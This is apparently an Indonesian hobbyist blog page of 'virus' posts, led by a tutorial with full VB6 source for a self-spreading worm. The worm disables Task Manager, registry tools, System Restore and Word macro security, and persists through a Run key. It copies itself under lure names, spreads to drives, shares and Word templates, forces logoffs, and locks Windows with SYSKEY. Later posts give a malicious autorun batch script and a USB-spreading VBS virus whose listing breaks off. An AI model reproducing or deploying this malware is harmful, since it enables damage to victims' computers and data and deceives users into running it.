Tampilkan postingan dengan label Virus. Tampilkan semua postingan
Tampilkan postingan dengan label Virus. Tampilkan semua postingan

Rahasia Membuat Worm Menggunakan VB 6.0

Orang awam menyebut bahwa Worm sama saja dengan Virus, tetapi kenyataan sebenarnya adalah berbeda walaupun memang sulit sekali untuk dibedakan karena sama-sama merusak (kaya ente tukang ngrusak anake wong hehehehe). Biasanya Worm dalam merusak suatu file atau dalam berkembang biak tidak menempelkan dirinya sendiri pada suatu file. Worm akan berkembang biak sendiri pada memory atau membuat file-file baru dg kriteria tertentu, atau yang terparah worm akan menindih suatu file dan menggantikannya dengan program worm yang mengakibatkan file tsb menjadi rusak. Sedangkan virus akan berkembang biak dan menempelkan dirinya sendiri pada suatu file  atau program dan merusaknya. Memang sama2 merusak dan kurang ajar hehehe…..
Ora usah kesuwen luak langsung bae carane pimen???sabar ndipit bro. Sebelumnya ini dia spesifikasi dari Worm yang akan kita buat. Worm ini dinamakan Worm B3R dengan spesifikasi :
  • Kode Worm    : B3R
  • Bahasa Program: Visual Basic
  • Jenis File         : exe
  • Target File       : DOC, MP3, JPG, BMP, SYS, dll.
  • Manipulasi       : Membelah layar Windows dan mengunci Windows XP dengan Syskey
Struktur Programnya :
  • Deklarasi umum ( declaration )
  • Form Loading
  • Copy File
  • Network Spreading
  • Anti Deletion
  • Main Module
  • Timer Manipulation ( manipulasi dengan timer )
Berarti ente harus mempunyai program Visual Basic dulu Bro dan mengistallnya atau juga tersedia VB 6.0 Portable dan tidak susah2 menginstallnya tapi inget anda harus masukkan Reg Key (allow .exe creation) lebih dulu. Aja nginstall GOM Player trus Bro nggo nonton B***P hehehe…..
Nah ini urutannya :
  1. Buka program Visual Basic 6.0 dan create new project STANDAR EXE dan klik OK
  2. pada tampilan visual basic sebelah kiri terdapat ikon2, dan yang harus anda lakukan adalah mengklik ikon pictureBox dan Timer, untuk Picture Box anda membuat 2 dan mengaturnya secara rapi dan untuk Timer anda membuat 5 Timer dan aturlah dengan rapi. Buatlah seperti contoh gambar di bawah ini :

  1. klik form 1 dan masuk ke jendela View dan klik code dan masukkan listing program untuk membuat form seperti berikut :

‘————————————————————-
‘ CGW: CyberGrind Worm
‘ B3R: Betness variant 3 Reincarnation
‘ (2010)CopyLeft, Cybergrind, BetnessCry, Java, Indonesia
‘ email: beta_amr@live.com
‘ For educational purposes only!
‘ Evil is not aim but fulfill perfectness!
‘————————————————————-
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4

Private Declare Function ExitWindowsEx Lib “user32″ (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long

Private Declare Function CopyFile Lib “kernel32″ Alias “CopyFileA” (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long

Private Declare Function FindWindow Lib “user32″ Alias _
“FindWindowA” (ByVal lpClassName As String, ByVal _
lpWindowName As String) As Long


Dim pict As Picture
Dim a As Integer

Private Declare Function BitBlt _
Lib “gdi32″ ( _
ByVal hDestDC As Long, _
ByVal X As Long, ByVal Y As Long, _
ByVal nWidth As Long, _
ByVal nHeight As Long, _
ByVal hSrcDC As Long, _
ByVal XSrc As Long, ByVal YSrc As Long, _
ByVal dwRop As Long _
) As Long

Private Declare Function GetDesktopWindow _
Lib “user32″ () As Long

Private Declare Function GetDC _
Lib “user32″ ( _
ByVal hwnd As Long _
) As Long

Private Declare Function ReleaseDC _
Lib “user32″ ( _
ByVal hwnd As Long, _
ByVal hdc As Long _
) As Long

Private Const SWP_NOSIZE = &H1
Private Const SWP_NOMOVE = &H2
Private Const SWP_NOZORDER = &H4
Private Const SWP_NOREDRAW = &H8
Private Const SWP_NOACTIVATE = &H10
Private Const SWP_FRAMECHANGED = &H20
Private Const SWP_SHOWWINDOW = &H40
Private Const SWP_HIDEWINDOW = &H80
Private Const SWP_NOCOPYBITS = &H100
Private Const SWP_NOOWNERZORDER = &H200
Private Const SWP_DRAWFRAME = SWP_FRAMECHANGED
Private Const SWP_NOREPOSITION = SWP_NOOWNERZORDER
Private Const HWND_TOP = 0
Private Const HWND_BOTTOM = 1
Private Const HWND_TOPMOST = -1
Private Const HWND_NOTOPMOST = -2
Private Declare Function SetWindowPos _
Lib “user32″ ( _
ByVal hwnd As Long, _
ByVal hwndInsertAfter As Long, _
ByVal X As Long, _
ByVal Y As Long, _
ByVal CX As Long, _
ByVal CY As Long, _
ByVal wFlags As Long _
) As Long
Private mbOnTop As Boolean

Private Property Let OnTop(Setting As Boolean)
If Setting Then
SetWindowPos hwnd, HWND_TOPMOST, _
0, 0, 0, 0, SWP_NOMOVE Or SWP_NOSIZE
Else
SetWindowPos hwnd, HWND_NOTOPMOST, _
0, 0, 0, 0, SWP_NOMOVE Or SWP_NOSIZE
End If
mbOnTop = Setting
End Property

Private Property Get OnTop() As Boolean
OnTop = mbOnTop
End Property

Private Sub Form_Load()
On Error Resume Next

Dim drives
Dim regrun
Dim xx
Dim X
Dim Y
Dim z
Dim zz
Dim fso

‘—
App.TaskVisible = False

‘===
Set regrun = CreateObject(“Wscript.shell”)
regrun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Stask”, “c:\csw.exe”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoRun”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsNT\SystemRestore\DisableConfig”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsNT\SystemRestore\DisableSR”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableRegistryTools”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableTaskMgr”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableTaskMgr”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security”, 1, “REG_DWORD”

‘=
X = App.path & “\” & App.EXEName & “.exe”
Y = “c:\WINDOWS\creditcardinfo.txt.EXE”
z = “c:\ccinfo.EXE”
zz = “c:\csw.exe”
zzz = “c:\readme.txt”
zzzz = “c:\windows\readme.txt”
zzzzz = “c:\windows\system32\readme.txt”
mark = “c:\version.sys”

CopyFile X, Y, 0
CopyFile X, z, 0
CopyFile X, zz, 0
CopyFile X, zzz, 0
CopyFile X, zzzz, 0
CopyFile X, zzzzz, 0

‘=
If Dir(“c:\version.sys”) = “” Then
Set fso = CreateObject(“scripting.filesystemobject”)
Set drives = fso.drives
For Each Drive In drives
If Drive.isready Then
CopyFile X, mark, 0
Dosearch (Drive & “\”)
End If
Next
End If

Timer1.Enabled = True
Timer2.Enabled = True
Timer3.Enabled = True
Timer4.Enabled = True
Timer5.Enabled = True
Call NetSpread
Call Main
End Sub

‘=
Function Dosearch(path)

End Function
On Error Resume Next
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set folder = fso.getfolder(path)
Set Files = folder.Files

For Each file In Files
‘=
If LCase(fso.GetExtensionName(file.path)) = “doc” Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If
‘=
If LCase(fso.GetExtensionName(file.path)) = “sys” Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If
‘=
If LCase(fso.GetExtensionName(file.path)) = “dll” Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If
‘=
If LCase(fso.GetExtensionName(file.path)) = “jpg” Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If
‘=
If LCase(fso.GetExtensionName(file.path)) = “bmp” Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If
‘=
If LCase(fso.GetExtensionName(file.path)) = “mp3″ Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If

On Error Resume Next

Next

Set Subfolders = folder.Subfolders
For Each Subfolder In Subfolders
Dosearch Subfolder.path
Next
End Function

Sub NetSpread()

On Error Resume Next
Set Network = CreateObject(“WScript.Network”)
Set Shares = Network.EnumNetworkDrives

If Shares.Count > 0 Then
Set fso = CreateObject(“Scripting.FileSystemObject”)
For Counter1 = 0 To Shares.Count – 1
If Shares.Item(Counter1) <> “” Then
fso.GetFile(wscript.ScriptFullName).Copy (“kamasutra.txt.exe”)
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing

End If
Set Shares = Nothing
Set Network = Nothing
End Sub

‘=
Sub Main()
On Error Resume Next
Dim zz, zz1, file, fso, oword, nt, b, i, iw, attr
zz1 = App.path & “\” & App.EXEName & “.exe”
file = “c:\csw.exe”
file2 = “c:\windows\readme.txt.exe”
file3 = “c:\windows\ccinfo.exe”

CopyFile zz1, file, 0
CopyFile zz1, file2, 0
CopyFile zz1, file3, 0

On Error Resume Next
Open “c:\v.reg” For Output As 2
Print #2, “REGEDIT4″
Print #2, “[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]“
Print #2, “”"Level”"=dword:00000001″
Print #2, “[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]“
Print #2, “”"Level”"=dword:00000001″
Close 2
Shell “regedit /s c:\v.reg”, vbHide
Kill “c:\v.reg”

On Error Resume Next
Open “c:\vv.reg” For Output As 5
Print #5, “Windows Registry Editor Version 5.00″
Print #5, “[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]“
Print #5, “”"Level”"=dword:00000001″
Print #5, “[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]“
Print #5, “”"Level”"=dword:00000001″
Close 5
Shell “regedit /s c:\vv.reg”, vbHide
Kill “c:\vv.reg”

On Error Resume Next
If Dir(“c:\m3r.sys”) <> “m3r.sys” Then
Open “c:\m3r.sys” For Output As 9
Print #9, “Sub document_close()”
Print #9, “On Error Resume Next”
Print #9, “Open “”c:\m3r.txt”" For Output As 2″
Print #9, “Print #2, “”sub document_open()”"”
Print #9, “Print #2, “”On Error Resume Next”"”
Print #9, “Print #2, “”‘by M3:Reincarnation”"”
Print #9, “Print #2, “”obj =”
ActiveDocument.Shapes(1).OLEFormat.ClassType “”"”
Print #9, “Print #2, “”With”
ActiveDocument.Shapes(1).OLEFormat “”"”
Print #9, “Print #2, “” .ActivateAs ClassType:=obj”"”
Print #9, “Print #2, “” .Activate”"”
Print #9, “Print #2, “”End With”"”
Print #9, “Print #2, “”end sub”"”
Print #9, “Close 2″
Print #9, “Set fso = “CreateObject(“”Scripting.FileSystemObject”")”
Print #9, “Set nt =”
ActiveDocument.vbproject.vbcomponents(1).codemodule “”
Print #9, “Set iw = fso.OpenTextFile(“”c:\m3r.txt”", 1, True)”
Print #9, “nt.DeleteLines 1, nt.CountOfLines”
Print #9, “i = 1″
Print #9, “Do While iw.atendofstream <> True”
Print #9, “b = iw.readline”
Print #9, “nt.InsertLines i, b”
Print #9, “i = i + 1″
Print #9, “Loop”
Print #9, “ActiveDocument.Shapes.AddOLEObject _”
Print #9, “FileName:=”"c:\csw.exe”", _”
Print #9, “LinkToFile:=False”
Print #9, “ActiveDocument.Save”
Print #9, “Open “”c:\vv.reg”" For Output As 3″
Print #9, “Print #3, “”REGEDIT4″”"
Print #9, “Print #3,”"[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]“”"
Print #9, “Print #3, “”"”"”Level”"”"=dword:00000001″”"
Print #9, “Print #3,”"[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]“”"
Print #9, “Print #3, “”"”"”Level”"”"=dword:00000001″”"
Print #9, “Close 3″
Print #9, “Shell “”regedit /s c:\vv.reg”", vbHide”
Print #9, “Kill “”c:\vv.reg”"”
Print #9, “Open “”c:\vvv.reg”" For Output As 4″
Print #9, “Print #4, “”Windows Registry Editor Version 5.00″”"
Print #9, “Print #4,”"[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]“”"
Print #9, “Print #4, “”"”"”Level”"”"=dword:00000001″”"
Print #9, “Print #4,”"[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]“”"
Print #9, “Print #4, “”"”"”Level”"”"=dword:00000001″”"
Print #9, “Close 4″
Print #9, “Shell “”regedit /s c:\vvv.reg”", vbHide”
Print #9, “Kill “”c:\vvv.reg”"”
Print #9, “End Sub”
Close 9

On Error Resume Next
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set oword = CreateObject(“Word.Application”)
oword.Visible = False
Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile(“c:\m3r.sys”, 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop

On Error Resume Next
oword.NormalTemplate.Save
SetAttr oword.NormalTemplate.FullName, vbReadOnly
oword.NormalTemplate.Close
Set oword = Nothing
End If

End Sub

‘=
Private Sub Timer1_Timer()
On Error Resume Next
CopyFile “c:\readme.txt”, “c:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “d:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “e:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “f:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “g:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “h:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “i:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “j:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “k:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
Call NetSpread
End Sub

‘=
Private Sub Timer2_Timer()
On Error Resume Next
Dim strClassName As String
Dim strCaption As String

strClassName = “#32770″
strCaption = “System Configuration Utility”
If FindWindow(strClassName, strCaption) <> 0 Then
lngResult = ExitWindowsEx(4, &H0)
End If

strClassName = “RegEdit_RegEdit”
strCaption = “Registry Editor”
If FindWindow(strClassName, strCaption) <> 0 Then
lngResult = ExitWindowsEx(4, &H0)
End If

strClassName = “#32770″
strCaption = “Windows Task Manager”
If FindWindow(strClassName, strCaption) <> 0 Then
lngResult = ExitWindowsEx(4, &H0)

End If

strClassName = “ThunderRT6Main”
strCaption = “HijackThis”
If FindWindow(strClassName, strCaption) <> 0 Then
On Error Resume Next
Set regrun = CreateObject(“Wscript.shell”)
regrun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SecureBoot”, 3, “REG_DWORD”
lngResult = ExitWindowsEx(4, &H0)
End If

On Error Resume Next
X = App.path & “\” & App.EXEName & “.exe”
Y = “c:\WINDOWS\msginax.dll”
z = “c:\ccinfo.EXE”
zz = “c:\csw.exe”
zzz = “c:\readme.txt”
zzzz = “c:\windows\readme.txt”
zzzzz = “c:\windows\system32\readme.txt”
CopyFile X, Y, 0
CopyFile X, z, 0
CopyFile X, zz, 0
CopyFile X, zzz, 0
CopyFile X, zzzz, 0
CopyFile X, zzzzz, 0

On Error Resume Next
X = “c:\windows\system32\readme.txt”
Y = “c:\WINDOWS\msginax.dll”
z = “c:\ccinfo.EXE”
zz = “c:\csw.exe”
zzz = “c:\readme.txt”
zzzz = “c:\windows\readme.txt”
CopyFile X, Y, 0
CopyFile X, z, 0
CopyFile X, zz, 0
CopyFile X, zzz, 0
CopyFile X, zzzz, 0

On Error Resume Next
X = “c:\readme.txt”
Y = “c:\WINDOWS\msginax.dll”
z = “c:\ccinfo.EXE”
zz = “c:\csw.exe”
zzz = “c:\readme.txt”
zzzz = “c:\windows\system32\readme.txt”
CopyFile X, Y, 0
CopyFile X, z, 0
CopyFile X, zz, 0
CopyFile X, zzz, 0
CopyFile X, zzzz, 0

‘=
On Error Resume Next
Set regrun = CreateObject(“Wscript.shell”)
regrun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Stask”, “c:\csw.exe”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoRun”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsNT\SystemRestore\DisableConfig”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsNT\SystemRestore\DisableSR”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableRegistryTools”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableTaskMgr”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableTaskMgr”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security”, 1, “REG_DWORD”

End Sub

‘=
Private Sub Timer3_Timer()
On Error Resume Next

If Day(Date) = 21 Or Day(Date) = 4 Or Day(Date) = 20 Or Day(Date) = 31 Or Day(Date) = 8 Then
lngResult = ExitWindowsEx(4, &H0)
End If

If Day(Date) = 13 Or Day(Date) = 26 Or Day(Date) = 1 Then
Set regrun = CreateObject(“Wscript.shell”)
regrun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SecureBoot”, 3, “REG_DWORD”
For i% = 1 To 1000000
On Error Resume Next
Shell “c:\csw.exe”
Next i%
End If

If TimeValue(Now) > TimeValue(“09:00:00″) Then
Call animasi
End If

End Sub

Private Sub animasi()
Dim X     As Long, Y As Long
Dim XSrc  As Long, YSrc As Long
Dim dwRop As Long, hwndSrc As Long, hSrcDC As Long
Dim Res   As Long
Dim m1, m2
Dim n1, n2
Dim PixelColor, PixelCount
OnTop = True
Randomize
a = Rnd * 3

On Error Resume Next
Width = Screen.Width
Height = Screen.Height
Randomize
ScaleMode = vbPixels
Move 0, 0, Screen.Width + 1, Screen.Height + 1
dwRop = &HCC0020
hwndSrc = GetDesktopWindow()
hSrcDC = GetDC(hwndSrc)
Res = BitBlt(hdc, 0, 0, ScaleWidth, _
ScaleHeight, hSrcDC, 0, 0, dwRop)
Res = ReleaseDC(hwndSrc, hSrcDC)
Show
Set pict = Image
WindowState = vbMaximized
Picture1.Width = Screen.Width \ 15
Picture1.Height = Screen.Height \ 15
Picture1 = pict
Picture2 = pict

End Sub

Private Sub Timer4_Timer()
On Error Resume Next
If a = 0 Then
Picture1.PaintPicture Picture2, 0, -2
Picture1.PaintPicture Picture2, 0, Picture1.ScaleHeight – 2
Picture2 = Picture1.Image
End If
If a = 1 Then
Picture1.PaintPicture Picture2, 0, 2
Picture1.PaintPicture Picture2, 0, -Picture1.ScaleHeight + 2
Picture2 = Picture1.Image
End If
If a = 2 Then
Picture1.PaintPicture Picture2, -2, 0
Picture1.PaintPicture Picture2, Picture1.ScaleWidth – 2, 0
Picture2 = Picture1.Image
End If
If a = 3 Then
Picture1.PaintPicture Picture2, 2, 0
Picture1.PaintPicture Picture2, -Picture1.ScaleWidth + 2, 0
Picture2 = Picture1.Image
End If

End Sub

Private Sub Timer5_Timer()
a = Rnd * 3
End Sub


  1. ketikkan list diatas dengan baik dan teliti jangan sampai terjadi kesalahan/syntax error, biasanya kalau terjadi kesalahan akan ditunjukkan dengan warna merah pada list yang salah, atau copy paste list di atas.
  2. Jika sudah selesai mengetikkan list di atas sekarang kita mulai atur form. Kita lihat sebelah kanan pada tampilan visual basic anda disitu terdapat properties kemudian pilih form1 dan kita uba data2nya seperti berikut :
AutoRedraw           = -1 ‘True
BorderStyle          = 0 ‘None
Caption              = “cgw”
ClientHeight         = 3285
ClientLeft           = 0
ClientTop            = 0
ClientWidth          = 4335
DrawWidth            = 10
ForeColor            = &H8000000F&
KeyPreview           = -1 ‘True
LinkTopic            = “csw”
MousePointer         = 99 ‘Custom
ScaleHeight          = 219
ScaleMode            = 0 ‘User
ScaleWidth           = 3757
ShowInTaskbar              = 0 ‘False
StartUpPosition      = 3 ‘Windows Default
Visible              = 0 ‘False
Setelah selesai mengatur form1 sekarang saatnya kita mengatur PictureBox 1 dan isikan data2 seperti dibawah :

Appearance    = 0 ‘Flat
AutoRedraw    = -1 ‘True
BackColor     = &H80000005&
BorderStyle   = 0 ‘None
DataFormat    = General
ForeColor     = &H80000008&
Height               = 495
Left          = 0
ScaleHeight   = 33
ScaleMode     = 3 ‘Pixel
ScaleWidth    = 14
TabIndex      = 0
Top           = 0
Width         = 208
untuk picture box 2 isikan data2 seperti berikut :
AutoRedraw    = -1 ‘True
Height               = 495
Left          = 138
ScaleHeight   = 29
ScaleMode     = 3 ‘Pixel
ScaleWidth    = 2
TabIndex      = 1
Top           = 840
Visible       = 0 ‘False
Width                = 93
Untuk Timer 1 isikan data :    Interval      = 50000
Left          = 720
Top           = 1800
Untuk Timer 2 : Interval    = 1000
Left         = 1200
Top           = 1800
Untuk Timer 3 : Interval    = 60000
Left          = 120
Top           = 1800
Untuk Timer 4 : Interval    = 1
Left          = 2400
Top           = 1800
Untuk Timer 5 : Interval    = 60000
Left          = 1800
Top           = 1800

  1. Setelah selesai mengatur semua kita simpan data-data form tsb

  1. Setelah semua selesai kita akan membentuk file exe dengan cara kita atur lebih dulu project kita.

Klik kanan pada project1 dalam hal ini contohnya project saya yang saya namakan BetnessCry dan akan muncul jendela dan pilih BetnessCry properties dan akan muncul jendela seperti berikut :

Pilih Make kemudian kita ganti pada version number dengan angka  21 semua. Kemudian pada Type dan Value kita ubah sesuai keinginan kita.
  1. Oia untuk mengecoh penampilan Worm ini agar seseorang mengkliknya kita ubah icon tersebut dengan cara klik ganda pada project explorer contoh saya adalah betness (worm.frm) dan pada data properties kita cari ikon dan ganti sesuai keinginan anda. Lihat contoh dibawah :




Ikon yang saya gunakan pada project saya adalah seperti berikut :

Ikon yang saya gunakan adalah ikon media player classic soalnya untuk menipu orang untuk mengkliknya.
  1. Setelah semua proses selesai kita buat worm tersebut menjadi aplikasi (exe) yaitu kita masuk ke menu file dan klik make exe dan simpanlah.
Nah sekian dulu tutorial dari saya ini. Ingat jangan dibuat untuk kejahatan, ini hanyalah ilmu dan ilmu harus di amalkan dan di bagi2kan hehehe.OK BRO…..!!!turun bero hehe…
READMORE
 

Tutorial &toolsuntuk membuat trojan

download filenya dulu,

tutorial dan toolsnya udah ada didalam.

untuk lebih bagus lagi gunakan anti virus killer,
untuk softwarenya liat di postingan yang lain.
READMORE
 

Buat Virus Modifikasi Autorun.inf

 copas script berikut kedalam notepad ::

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\C urrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f



save as dengan extensi .bat
kemudian buat autorun.inf ::

[autorun]
open=nama_file.bat
save as dengan extensi .inf

tempatkan kedua file tersebut kedalam1 directory....
bagikan dan nikmati
READMORE
 

Always Caps Lock (program jahil sederhana)

copas code berikut di notepad ::

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

save as dengan extensi .vbs
untuk mematikannya cukup dari task manager di bagian wscript.exe

selamat mencoba
READMORE
 

membuat virus sederhana dengan notepad

Saran ::
-gunakan deep freeze
-jangan di coba di PC pribadi
-gunakan sesuai kebutuhan


* virus extensi vb(visual basic)
copas code berikut di notepad ::

‘//-ishal-//

‘//-INI VIRUS BERBAHAYA JANGAN DIBUAT MAIN-MAIN!!!!!!!-//

‘//-Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian
lanjutkan kegiatan virus
-//

on error resume next

‘//-Dim kata-kata berikut ini-//

dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd

‘//-Set sebuah teks yang nantinya akan dibuat untuk
Autorun Setup Information
-//

atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe terserah.exe.vbs”

set fs = createobject(”Scripting.FileSystemObject”)

set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text=mf.openastextstream(1,-2)

do while not text.atendofstream

mysource=mysource&text.readline

mysource=mysource & vbcrlf

loop

do

‘//-Copy diri untuk menjadi file induk di Windows Path
(example: C:\Windows)-//


Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath & “\terserah.exe.vbs”)

tf.attributes = 32

set tf=fs.createtextfile(winpath & “\terserah.exe.vbs”,2,true)

tf.write mysource

tf.close

set tf = fs.getfile(winpath & “\bosgentongs.exe.vbs”)

tf.attributes = 39

‘//-Buat Atorun.inf untuk menjalankan virus otomatis
setiap flash disc tercolok
-//

‘//-Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket-//

for each flashdrive in fs.drives

‘//-Cek Drive-//

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path
“A:” then

‘//-Buat Infector jika ternyata Drivetypr 1 atau 2. Atau
A:\-//


set tf=fs.getfile(flashdrive.path &”\bosgentongs.exe.vbs”)

tf.attributes =32

set tf=fs.createtextfile(flashdrive.path &”\bosgentongs.exe.vbs”,2,true)

tf.write mysource

tf.close

set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)

tf.attributes =39

‘//-Buat Atorun.inf yang teks-nya tadi sudah disiapkan
(Auto Setup Information)-//


set tf =fs.getfile(flashdrive.path &”\autorun.inf”)

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)

tf.write atr

tf.close

set tf =fs.getfile(flashdrive.path &”\autorun.inf”)

tf.attributes=39

end if

next

‘//-Manipulasi Registry-//

set rg = createobject(”WScript.Shell”)

‘//-Manip – Ubah Title Internet Explorer menjadi
terserah v.s. ANTIVIRUS-//


rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window
Title”,” THE BOSGENTONGS v.s. ANTIVIRUS “

‘//-Manip – Set agar file hidden tidak ditampilkan di
Explorer-//


rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\Advanced\Hidden”,
“0”, “REG_DWORD”

‘//-Manip – Hilangkan menu Find, Folder Options, Run, dan
memblokir Regedit dan Task Manager-//

rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFind”,
“1”, “REG_DWORD”

rg.RegWrite
